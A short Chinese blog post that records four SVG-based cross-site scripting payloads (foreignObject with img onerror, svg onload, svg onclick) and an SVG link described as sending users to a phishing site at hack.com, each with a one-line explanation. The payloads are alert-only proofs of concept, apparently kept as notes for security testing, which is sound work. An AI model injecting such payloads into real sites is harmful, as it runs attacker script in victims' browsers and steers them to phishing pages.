记录几个svg恶意脚本
记录几个svg恶意脚本
脚本一
<svg>
<foreignObject width="100" height="50">
<img src="x" onerror="alert('XSS')"
</foreignObject>
</svg>
说明:利用特殊标签 <foreignObject> 在 SVG 中嵌入包含XSS脚本的 HTML/XHTML 内容,当用户加载 <img> 失败后会触发 alert 警告。
脚本二
<svg onload="alert('XSS')"></svg>
说明:这个脚本在系统中测试没有生效,猜测是页面二次渲染后导致onload不生效,或是其他原因。脚本本身是当 <svg> 加载完成后触发 alert警告。
脚本三
<svg onclick="alert('XSS')"></svg>
说明:当用户点击 <svg> 时,触发 alert 警告。
脚本四
<svg width="200" height="50">
<a href="https://hack.com"></a>
</svg>
说明:当用户点击 <svg> 时,用户页面会跳转到黑客的钓鱼网站

浙公网安备 33010602011771号